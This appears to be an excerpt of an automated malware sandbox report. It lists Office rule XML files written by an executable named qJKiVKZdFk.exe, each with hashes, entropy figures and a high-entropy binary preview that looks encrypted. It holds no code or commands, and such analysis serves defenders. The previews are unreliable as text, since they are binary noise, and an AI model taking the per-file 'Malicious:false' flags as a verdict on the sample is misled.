                                                                                                                                      Size (bytes):1126
                                                                                                                                      Entropy (8bit):7.794586482838219
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:b/uquXT6aHI+s/5btzLLC1apHWmPPiSc4+GxDZuAx3QwLibeibD:aT6ssFFvjtW6PS4ZxDZ9gs3wD
                                                                                                                                      MD5:985D17C0227AA9FE3FD6245BFB47C120
                                                                                                                                      SHA1:745038619F00FD64A6DBEEA2A5A9B3BA5A1A4BDE
                                                                                                                                      SHA-256:A1CD8C2B808BC8F0995BBD5861B95AA321D8972CF4192B5437A0A49AD84C81EA
                                                                                                                                      SHA-512:CDD5454D3FAAC5E8609A1BDFBCAC7B11DC147DC7573249BB2A3415DCEB3691115596720C6E795B25EFDAD03BA08B56F852A88C9576EF3ACE5BBAEEF2B4A46126
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...M}...6.-E.+u.he9...C...........<.$M`....eNW...l..e0)....x.6g....&r.aTT..ku..P....K.4H....?....]...b....jQ..f..~.........Q/.S.|XC..A#S.,.g.R..>Y%e..]b!..C./i.k...\.p.H...].I....M#1.8...e[('A..F3...4.....f......%d.TC.r.=`.S..$.{EZ..=.%..lQe)..w.OtwD...4A..8..Dbd....N.........q a.|.qgsia.$R$.....:.{.\3k xC......T.jY;g.%....|h.^R.5i.X...R....R...o...I7......}...7.Y.?c.... ..m....F...O,..a...t.,.7a..hw.!...~7.ql.p ...)..q.c.QX=>..7.U..Td...M..f...j.B...Z.m...,#[.~...;...B.p.....?.!..x...'.......nv\..6..6......'........r...S$G...h..\...$..M.vD.a......6P.(.....VJfg...nJ!cy.7.... h].>....=...X-..[D..\9lZc..\..~qj..%F(.*Q.&.Z........4n.^ij....xJNI.v!O....C.H.6.%ux.*.:j.....G.......@O.%........y..`...0.v.v......a.G.h....H...h.....]&A.....i8.D..*..2_n.C.0.u<?.@.s.tK..$a..eK.5.j....y_.M.Np..........=..H.k.@n"..l.]...[i;..=.....P..M'..W..........I..Z!7C...\..&t.I...kF.*..1p.J...H4<.|~}......&w.z.!"....$...R.Z..:-.i....._.......2...+.....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270003v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1662
                                                                                                                                      Entropy (8bit):7.868476571783308
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2FCMcbiDGl+6NLr5qVlLum4UMLsbk9vsD:2wgSl+IfAV+pI
                                                                                                                                      MD5:E68E69617E6F34DDEE0CBA8BCD72E1DE
                                                                                                                                      SHA1:27E988C7052ECEED7AA4FA91E3174E5C6FD28A73
                                                                                                                                      SHA-256:6EAFE5689A5BACFB89F3E4A89187B808BD4A3BD1C5CD1545DB75F188D526F55A
                                                                                                                                      SHA-512:AF6BB67EF2DB4FE6A4EE646AB43B31A86EFB384B430C1DA6712ADA300035331E8671CE18395175C642DD5504A7EE6DC71975A2BB9753673D8B1515F954D87B01
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....8........\7....K?.Lz.=KZ.K.n,.B$......dpP6.......A........K.....g.Ro`G.m......F.e.u.V<.e.M(..f.|...b..<.y!..M..CX..3{%D.I.>.N...C.$......s+.{ZV[....i...P\*.Xaah.].........G.z..d%..J..%.%lHH.r.....l......%...A..ZO.,.......U(X\y....p..j.>.|..O.Zlz-+.=....vV...c.<."t..I.;Q1~J.g...qSS...|._.42$.|.k.2...t........._...,..A..E..$4U....3F._...u.....E...z33....D...$.>......e..+..C.rP...%}s..X.U.W.S...uxn..<... L..gu.^..w=.4.0.=f....l..)d..C./.L.......!....yA.#.......u..U..,......jh.....-j)...3@%CK..Yc.....(.h..i~z...,..=2...j[L.zvG?#..W../.Hr.w..:{=a.&B.or.. ...p.AH.:....zw.a..^0...`.....*.. ...4.|.cL<%.'Ms.P.v..M .69...50'2,..Y.RMk....~m...|\S.... W..k..lF.O...pT.....j...OR4.X..+.8B.-...?..C..Y.xO.db5i.r.t......1s..C../p...M6N.*X0..%..}...a...JNz&~....'..h[.7...L.k......:...=.BT...Z.9.......@.[I......q.sY.s.2.....zj....._..~..v.l..BD...j....T_...e{D."{3.z...Z..(0U...Y..6.S;;..~.s.V|...CPtF...j.[....c...DcgV..n.'...z..("I..._...^...m^>>

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270004v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):831
                                                                                                                                      Entropy (8bit):7.732101555452924
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:+L+ADMV31/qikFD/+1WbjKxdEABqB9UymNLCsNbD:wQirrKWQ7YUN+SD
                                                                                                                                      MD5:8E25DA03B71618B5008FB8E13437C5ED
                                                                                                                                      SHA1:0970900E373B641A335A3F12897A1BF402ADF97F
                                                                                                                                      SHA-256:C4F533E973106FFC9B98C73344271BA86F5635A1F3E6B80CABAEAB4018525F07
                                                                                                                                      SHA-512:5648A3B770CFB9ACDE9D97C1FAB9AA5EDFA56BD42190434DF509272AC6DB2707F4E4551163A70BF405B32FBEEA0837AA319968E709E3920708471CE6552D835A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.1.y...W.Nc%]....q9.s.<`..&..}...f$.....i....S...c.......~q...5.1.|...0....9...\..x..,.~..[{..]..........7.w.B5....U...>vC...........(...`.D...!nU..)...].V..(........ ...m.(t=..J>.K.....t.... .....t....u#....xP..o..3..C.Y..I}2....c......)`.Rf......*...[..`.A@z~."..9\.....0.D...YY...6......s-d..L..&...ID0.G.zW/O.....6.<............$.}.c(B....225.Rh...LL(G..H.....5w.$...'..Z.....9..|.}+...b.Hd?...ZN..?.WM{{`.C..v..K.%;.#U.%I....xF..Kwic..uc'....W.e.+.....+..k.....A...o9^$<i...0~..\..I6B..v.....;.p.FS....u.....)I[f.].m.....)...z.$M...w.....h....+.8-A..../.p..+(....}..i...\.4."....6.'..J$.L.We`.l.W(......S..8o8...M...)*8u....)4V._.6.xM....y.k\..T.,W..R1..+.....=+.a........whD.S.M#.....9m..`r|.v.=}j5.Ptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270005v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1485
                                                                                                                                      Entropy (8bit):7.863043444235332
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QvoK70WEkDkWGCIMTwtXDgZgJLhb7bc/i/DR8RdDS8XZbaaGk7Tabv4Ix0rGZbJX:QN710CEtygn7bKRI8XQaGI47eGZlD
                                                                                                                                      MD5:1893923F62F99A7B50B79E6AC71B2BB3
                                                                                                                                      SHA1:95BC6743E83F625954544D1410FAD09A2E1C13EA
                                                                                                                                      SHA-256:3B3F73083A952A882EC0487669BF92429DF4CD5B59CB024556108B3139968802
                                                                                                                                      SHA-512:79A1B4804C1910CF8FB881C45D3759B9A7B0BB017C129331F412BFD063EC56A84D06D4DB19B3B2627223FEE479A9E38360B812A74975F25C6CF667930B368CDF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlm....:......>..%. ..2-..._...M....S..#.U.ZhU....(.{u..>..^....;}.....i.R.3xi..E..U...q.=....=...sN.u`.^........0..R.......Zn.-......B.......#9k...Pt..0.X.0x.OU.jqDw[..4...].x......W2...L.;\..+.a..K.......N.c.a..v.I..... ....).?.%.18.aMjl...nqp.W.U....f....)..h......G.F3... .8....'.[.wJ.~..e)..rNy..........L."F...}.t.....\.k.Ff.@E.[........QL...WB.......0Y..x...A5..,...0.[..%]........1..{ ..[.XBu' |.;..f'B.}>0.t*....Z...,.B_.RU5DO.......P0}....x..=........w..O.R.......K.e...P^..<.MX[J.0.P\;..t.W=........Ce...?."..W`.h...~M.w!i......^...v.D..j..e..?.....h..M.~.H.r..h6.C.*OP4.c.t.....P...X....7..?w.dA..V..&..LJ..V......l...[.F.W.Ve.......$..{*..5...eL..+.G......ICs.<.y.X...n.....L......F..rgL=..0e..#.p_........j..uW..?.-..h\....~5...j...4F.c#,....(....).`.%..^f..d..r.QF..,he..z.%.~v....M.>.e..<.qp._...D....b.".m....Q.).......T...N..ou.............z.x....0_.....hV\2L.P..!]Uzlh..d.....!.N.....f[H.....A.(.[.v...K....../+..\..\.@.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270006v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2088
                                                                                                                                      Entropy (8bit):7.898382251001128
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1MrmIKbUxVqI8umJb07ySojJ5ccUfeFpvKTpBt3JQ+pD:1G4Cn8ZJb0OSiQGFVKTXQ+B
                                                                                                                                      MD5:EFA73ADB9B80FB2954E8AEAB57AAB381
                                                                                                                                      SHA1:A235A50A12E2AA62A2CAC152936E20DEEC3B6063
                                                                                                                                      SHA-256:2F403981D4A6780A2F7CCB1343BAD259462565941E7C500791FAE9EAD4D0792C
                                                                                                                                      SHA-512:C7ED105FA1C70631D986CB0690F18D1DB054B8B5EAEFE32880A99B0CCDAFFD78F41FA916C36550B7A330911A4DB8938F2F0BFAB901C0F3291D7FFD58047F7778
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..8..[.r..q5._@..V=.m+...A].|.....9..)Jnp=-....D......S.iS..QV}...$...=v.ih.9K.YP... ./NhT.X!"{r.~3..Fc.N..w.BTXI$.Q.bc..+.a-.r.....4..3..LK}>I-j.....I...9IOs....F...{..'..=..\....(...6.H|j..z..B..i...........X9.......e%.... ~[..x~..+..c.M.qi.....D...y.r.........E.Q&.<......HkWmLy...<....zHyG...x.%.^..1..>;.+..6......K.u_...a....i.r.3...(..K.Y....".1.+ F."....3.VM. .....3......6e....]}y(....$N......!..|....6)............\.p[.u..R%....YK.....m%..,..}6}.-]...Bj.1.#.w..o.......)Y>.6...6^S.......I>..J.D...?.Y.d5....|s...L&.#......d.|.d.....;Vf|.mV....0XU.+K....{....io.H...q...`.......Y......W"=......".Y...!..c...w.,.....|~O..DejZ.|`....hQ2.M.W.....EH....,.....t.b\.r.....?v.W..e.3Rn.qT.E.....G.g.|......>z..1.....\%@...q.|\.^v!k..H\4. .E.X.f.CJD.t.."..7..N....5g.!.K.....`DR.!i......5..~$z.Z4....%G||`Y2Ap.. .V..R.....DSg}Rr./.......2.q.HvS9y.?"o.3.V=g........d..)N.,..<.....&...).h....v..~f.>..#.....E..{j. .IB$(_o.m....`:LB:.>........`[ky'.[.........!.t.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270007v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):761
                                                                                                                                      Entropy (8bit):7.744704151693997
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:XdKwiWehg9hjtlEuNMHLqIf/RZic6dh/lN000fd4AYDvLTnu0ukIcii9a:XdSWeChDlNMHLz3/ic6flNV0+PXTuPbD
                                                                                                                                      MD5:489DF238A63E9928BD04BCFADEE16645
                                                                                                                                      SHA1:8818C6FD3C34D6D7535EAA7803BD9F7655350DC0
                                                                                                                                      SHA-256:83B5E9D8C476D86AC8956C8A83B96BA722FDE835EB682887E9EA3E090A1A7766
                                                                                                                                      SHA-512:77C05DB19EE9DBEAE7D42118BABE433779D60317BE4780DFB71B4C0AC30D5863FA3627BBE91ECB111BAA575E45F90CD8408D3FE378F6A7F696E1E28391A7B9CC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.........{..8...J.{-Qr...*.dy(q^.i|0.....&.?...."_#.b"..z%.....jW{.,$.M..I.j.-L.q>.{^....Qt.C......D/R$....GX....`m2.'RFzp......c..Oc.K....S...?.3`,...@.s...N.;FIJ.A..".TI..zF7$..K...D.f.e..?U=.OXT........[.....".t.....<...-.RH..aVDVl..gkQ\.(..0.-......~]4.8...q.k`.v....C..*....'.H.}t...<...........*.{...~...(B...ut..!'..uM.....DR....c......R... |rn..m..U...z.......'.h#.pu...%...=5.......+.{-.9?.*M.K....f(...^.t.&..K..S...7.xW..R.A..4......=V.S...i.Q.>T.K...V.......u..X..Y.<.i.D...I#.>0.*[...`...0.K.....#F#.i..."...s...\..AV...8Ee.iT...'.wE../J....FP.....t4_.....C......$.........<.~..iH..J$r..l6..C.8@..:q.L....[.hr/......d..:..U.....).+...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270009v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):854
                                                                                                                                      Entropy (8bit):7.763880727456281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:N2axNXd1hH/OA4VRX5/9FM+QVS3sOF3PDvbD:EaXXd1B/OA4VRJ/LZ3s4ffD
                                                                                                                                      MD5:E0D33B8D9463626EC981F337D304485E
                                                                                                                                      SHA1:9256D7A6F3BEE3C3DC4626B07486612A595C8011
                                                                                                                                      SHA-256:19ADD92D03D838EAA89921D610A574C8722220123D68E3627E0485CE294910A0
                                                                                                                                      SHA-512:C31786B2AB135F37AC660FE20B35E9B2216F47220A6AF3243CBCD281EA5470382141B5C2C09A9040294141B53B6BCD886C9E7BF30BEDED95476691064A0E5038
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.G....H..YA.+ h....R...*^..MM1v..2b.\..z...|....-.j..T...6<..=.b.C.....N....xW....+m....wP..!..f....O?....9.=../.y8...%.i...& ....i....p.y..Y..R$..3{./......@.;..e,.....".[..y.$.$a.?...9......9,;...DJRD..zQC....X.K..Y,....DH...m.,9-x.........\..;.3i...[.-....-.r..f.6.).E.....T<....}r....e..d..I...".........t.]b.~....@mr.B?.....T.(y...@.'.(hv....V.......y...MJ.....R{.Q/g.9.C.;..~...c....V.k..R.]...x!.t.G..F.pR!.F.W+...6..G.m.Qk.D.H....v.\.`........}..>#.u.t!...A.....s.r..3a.p.1.{v[...m...@.....`.2.?...z..<...?e..&.b.X_ ....$......7G.L..'YG.J.B.Rv..;..{j...A..[.+.DJ......JJW..oA26.>4..g.ji0...O....r.K..XDzd. K.........7..iJv:S..w...Y=.={UB.e...NI.V.<..7.!.K..1A.....o.p.....<......L..s...\j...R..j...&.u7.....u"u...?.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270010v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1612
                                                                                                                                      Entropy (8bit):7.886159036130623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6G504SJJmPGwUhyB8x9VEzTa+9dEAXlFjTD:jUmPGwrBS47XEw
                                                                                                                                      MD5:D2527F43A00A8DF286C071C3A3784A8D
                                                                                                                                      SHA1:13F1B33DE0AB8ED3B209193401CD885BB802DD0E
                                                                                                                                      SHA-256:C85624FF1987B44E605A2E9BA023F7DD75533B0131D5E28FBBB19E81D31E9ECB
                                                                                                                                      SHA-512:2AF7E2991E31735A065EEFA3D73723767F34F29849CAD65757DBF7396425F1BE768B0B83E61B62D2D5301CA597AC798A82D98BA1F1B82AD2E9208DBD95DAC0E6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...-..V...}...]...[(...B.....N...t^........w.a..E`?.{...Q@...z.1..K...%..PP%,.W.?....F....c......l....n..&.x.....2.}<.......W..`. ..(........C.W..D..i4,......}N.U.>3O..]..L.)...0.........`......%.2P+6..K2...n%..7`.p.w#...]............u.t.$.6..Yl..,x.~........U...$G..[.r......|R{.W3c.m......U..w....qJ..W...d.S...d`..KW+A...aP....?.[..V.m.X..$E*..y3......V.....Em..a..#".;`1.".u.......x.a.>j.Z...%C.Q...JZ..9...D.d.R%aH.I.n....*..=.{...W...]......o.1.<.=.......t...[.6.K....s5G.d.\.$.......C[./..U....3.@.{."i.F..!<<.L.8.|U4.o..c.p..Z....9.....ZMt.Hu.....d..h.....d ....r..5R....A.I..1..)(...?.+.dz^.;'S0..v{.>.S...`E.N?.Y^.).....#...7b..h..5....(....G.M...b.....\).{.50..%.R7z...@.A.N..m.'..../........p.,6[$.0.Y@...:3I.mt..........p<.4F....x..\..;...l...............W...S.CAa..............[n.....b..hI.6.........Lhh..F4.....L..R.n.4...S[..y...'I.-DO7...-....&..0i<.d..g.LdQn.>.5Z...g.w.Y........!....f...FS.7.k.........%.../VO;P..t/.9.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270011v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):747
                                                                                                                                      Entropy (8bit):7.724435897496566
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:hRrt6i9GtW23KhWFJpNvx2mxDhdHvan54CmIrdj217DbdFP9wnAgLg9lkNVYu+uV:hRrt6i8k26mJ2GDbHynfNrANOnM9lE2C
                                                                                                                                      MD5:7487E4BC6581AACBA856FE2F8D135504
                                                                                                                                      SHA1:854E0A02D3B35FA5494EB8E4AD1C852C03B503E3
                                                                                                                                      SHA-256:9376B4A550DC3C42C8FDE43E1696813AB0283D6D3338054BCE0D24BE86EDD672
                                                                                                                                      SHA-512:8E8A9659F1CD1F3CD8E69A385890757A4E9E73845A80EA317E70DD65DC47C5665283FB98321233E5BA86FB12E9D9E325DE9DAB2D0DFD2E1B6FDDFAE2249DB60E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..yt.'.d>...`........2...%....&.p.J......RG.......b....rz..]b>.%....j..$.gR..N..|W......x....%4HG.FZ.2P.3.,..M.SW..Pc....o[..s..2..9..+.S+.r..!.aL.....Ti.k)-C>..QB.=u.....ps...~S.|..O...~f*.c%P...H...........s..p......R...z@....9../...`5...<0..2.im......3Cv.i".7....P.DJ._u..Q.A)_..ZP>.@.=...*..s..."...F#..Z..i..i......K...L....q"q.i}..p......R.R.I.P.C.o..J..a.].:(....b.R..s..D...a.:...O.:.|.U)H...b.6.CU.N...R..F"..d.}......5...xJl.,"..!..........X.TE.......h\...IY....P.r.S/...=.T..&...8^..r...._..~g........2.k.wj<{..@..f.u....G~iF.qa.u.j..~..8IZD.eO#>yb..y$G.z..@...Z'.o.l>[.".X.x.kT}..*...?.....Z...0&.....~...zk.1Htp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270012v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):742
                                                                                                                                      Entropy (8bit):7.710561684132513
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:0APABglwKWMa4t8EvTcbZ6CV2rEPlr+RXiDlvPCvp1ikuNZuVxPS0pC/PVyVukIX:5PAB1KWBETcbECV2HAvax1uQV1zCXbD
                                                                                                                                      MD5:955677746C3C5C541FDD8F67E2D978A0
                                                                                                                                      SHA1:A5F1F2A377853CC069AF15934C497AD1EFCA9435
                                                                                                                                      SHA-256:1F68834B3AAF0D651BF9F3442C6E53F23F268A1BA81C5D0627830D59F92759A0
                                                                                                                                      SHA-512:44DD7BB44B48E4AFDC93132C4EE8D3E19CD6D4DD898C516B5030DA39C8D22A26CAFCE4BE2FC74875A5717F8D1DF18190B64F08DFBBB92C2A9DBF4DA61D86B04A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..4.....+@.. .*.&\...1..1........#..c.O..R4....4.T.J.)....\...}h.@.WL.9Gn.rk..^U._<<.r.Q.....f.|.9.....75.L)..Y.|.!KrjBp..;....x.h{.jE...)...$.+;..*.Q.E.?..|q..#..z....1.7d....nx.....=U*;...S.f.D.1q...&...o.W.$...........a..r._....."O..C......>}j..3..up).ZP.....KE.j...iK..O....v....Kt................j..X.<..n.F.g..`....7..lV.G.l............"..?.Mk...ns[....X.O..4)q.j...9.....2..V.$..[^.k..+.<@0O..:..O.......j.....2...7..a..Z.1l.........\FYK..k.f..L.Xk4-..?.....ySX~.-@+f.:..:..A...5..}....a.gu......+....._.>...0U].*E).r]..x`.|..{..+.....>.....O73..51.. 6{..w.QP..p$..%[....Ms..".........l.~~...N.u..Z......&.5...".}....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270013v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):756
                                                                                                                                      Entropy (8bit):7.69172919870282
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:3qVlukbQ6oTQkWrjY1BtQ4L8nlwG2VP/DoWFhTExswRsdI038vukIcii9a:3uQ6oiHYhQ4kwJ/DowhIxHRV0XbD
                                                                                                                                      MD5:0A9E49F263C1A3F6FD6121DD268CB4D7
                                                                                                                                      SHA1:E319C887DD5EE6B2B9846C93F72B96DBF23E5D94
                                                                                                                                      SHA-256:B040302192419D5D0CC59F9EDB6F7CF4059A4313157C77E31E2850A9C0931101
                                                                                                                                      SHA-512:15C18BB075300A5E5AD897B905A2ADE5498F556847CE58ED2731B6F0981D1D77B4C196201A833D69B89B54AC6F41F1885F0AF44B43AA9EC9F6758AB1EE8AF28D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml*.7;.(W..rlly.$f....8..*..9|.."<..8..m..o.W..1:.H.....T.(..:V..c.#....3.N.Z6..6...6.....+.'j.}...ug.fm..K..Aaj..Z...Q.I{..fK....QA9m......3.W.NI..I.|@.o.......C...TS..M......j..|~0=(.RZp....O.^.......i.l..(..LO.B.. ..ch3...X..j.U...3..}. .....C....sn.mT.OY....$K\.!*|.4T...P...`.......)M.....f.i.[... ...&.(..T.D..#k.v.5q. ....=?...B..<...8}8..Vc.u.u.1......-.....F.>....]...o.m.?....`x....F.t.yv.Z. "...b.=..\.RK......m...#..6...3..]xK...6 ..O..}h.4T.{.....K...:.aP.o.NW..?(..`...Q.u.W...~.E...Zym..&........i...@s.{O.[(.6[./I0.^r5...=.oU......uQ...7.. g.>.-..b..m!.wl.A.(b..........A..r_-.F..!BiY;B......_.d.#.........h.].`@.3......u).CP.KG.z!tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270014v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):763
                                                                                                                                      Entropy (8bit):7.768107518325298
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:i4jI5recF04EJ5iTZKRtLVRkmBwYzfyDnlcouxbpz202PNSlwRnmuAIukIcii9a:i4jI5rZF0b5iT0/VGQbaDBulkvNpRkrX
                                                                                                                                      MD5:68EB7F37D5278F95A941243A3968A943
                                                                                                                                      SHA1:33D903005FFE511271A2E18ADA79652CE4924097
                                                                                                                                      SHA-256:089787047BA5143AEF69530A78FD4F5E433DC00C9DCA1CECD86155F1CF71D49A
                                                                                                                                      SHA-512:B8BF15763A1B6E730B2BDFCAB14ACCD31944006CCE8CD258A5B67B7021C94B6DC4C400740676EC23F0B14688AB19DC3E0C48D839C189CCC82B3B56FC2875E5E8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlr........e.b.....@..a..PT..sD....L.A..@.$.%H....~....\H.f?...L.V...n.;G.E{..:.a..A...:...E.'a. .l..n,....y.k.h..e..Q.v...A../...#e...3i.Y.<....m.AUHT.+ca...a.....'t....p...\......,..V+..3F..s..s.T.m."P.#.GJ.#o........&...........F...Z..u....R..../%.f...U.x..z..1m.187..M`...0..t'e...[......g.$.|.%..}9<.-K..KZ.n7i.?'..].*...VS...qI.J.c...u.....!..m$...G.*,.).QV}....{V....._!e.=shqMF..::Wnkw?:.u.{K.d...q...{X....W..bk....r{...~....).S...0..[J..v.fS...W......Q*..v.Y...j.().g.9..VL@fb.a......./3Uo?P...c...2.H>.|.4..E...[..Q..m.b...[O.D.........WZ .qgE....v(..A.+.S...$.C.X!.>..;..l.-.^.h...r$...".n\..6.....*..(.0..}..H.e.a^..u.&1...l....Z.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270015v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):956
                                                                                                                                      Entropy (8bit):7.801320795218143
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:9OYlxdm4xJ9msNDOUX+gKcryAG5FEUj+MARENdoM2bD:9OYH4IjRDDFryAmFEZdkdoMkD
                                                                                                                                      MD5:B7E10E6350C0DBDE3BFB9E635982A389
                                                                                                                                      SHA1:E26709BDBEC3DE4FE02B09075099412B63B5C0A2
                                                                                                                                      SHA-256:A1776EE5C714C2F5C7251302B74CFD5EE4E8A15D22EE8B39B6059B65FF9684EE
                                                                                                                                      SHA-512:17F0BC976744D6EDCDB5556300E4CA4C41249E159B621047D8B926A73D4B6A8D6D95E956206CC0B11AD0C9EBD2F722FF9CD786F24ACC46C750F97C42824F4A9C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml_.....o.w;.....\"..A...GX.ww.....n*:m....oc....l..hl.B.D......FRd...,.....(...L.[].7C/..64.3..r..r."....N=.Py.7...C.YS..`.s.h..b.C.B,i.d.;E.`9,.).[I.=...w.;.....M-.... ..J.8 ....-...t..zH[.\....+...y1..._-M...........".x.n'.....5...0...}a....k.0..C.....?y....O..(gdl....a_....w8..x..(8......b.).qL..../....f.j5....5-7...h%.q....7.j..../.T.\X.K.A^n...l......U....S.j......l.@..^..X...8=.r.%....pK.20...).b.].....p..v...%.1A...^..:~...d...)......].dex...e..+@..+.......|.3...<Py4...q..>.O..8g=..S...../4..t....M... 2....y...Em0.*.....].D.s..w.A.7....{Y..ic.oJ.wT.h.......s..4......A.WD..RW.pxe}&..^.....!.7..A..A.S..es....T...J=#.... ~.V. 1.6.V..{.1:.l..}q.5=.%.^...s...B}Fe.<V../Fx.X`C.G5c.$.V..v...).f......].~.`.Ip.......#.S...E......p.=.!.P...0....U..!ez..W..5v...?C.Z._YIa..6..HK)......\K{:..T.6,....I.|..2z..!E.(.o.*.F..s...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270016v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):837
                                                                                                                                      Entropy (8bit):7.740410510377084
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:jsqsaN15zSoHBBTfaCcDgKFyLl+h2wlvrzKJd4bQ8DnjQi5fJP6FbACIPukIciik:LsU1VphHygfwgwlv/M8DJ55oUCPbD
                                                                                                                                      MD5:51DCA7CF7D84B8D1272E31E22811DF42
                                                                                                                                      SHA1:D420CF24E365E016164EB89817A5973D279044A0
                                                                                                                                      SHA-256:F3CB9D47832FFB9DB7222D68A77703275350CBD2949948D8CD76D413942092BD
                                                                                                                                      SHA-512:C96808F78E467123D9B1258299EC0A7F8301D2E14158EFE2DB0CA797C319E214EACE7BCFEF0B6504AC5AF8A5D9A6E58D6E3D20675B8FA628202A4046068509A2
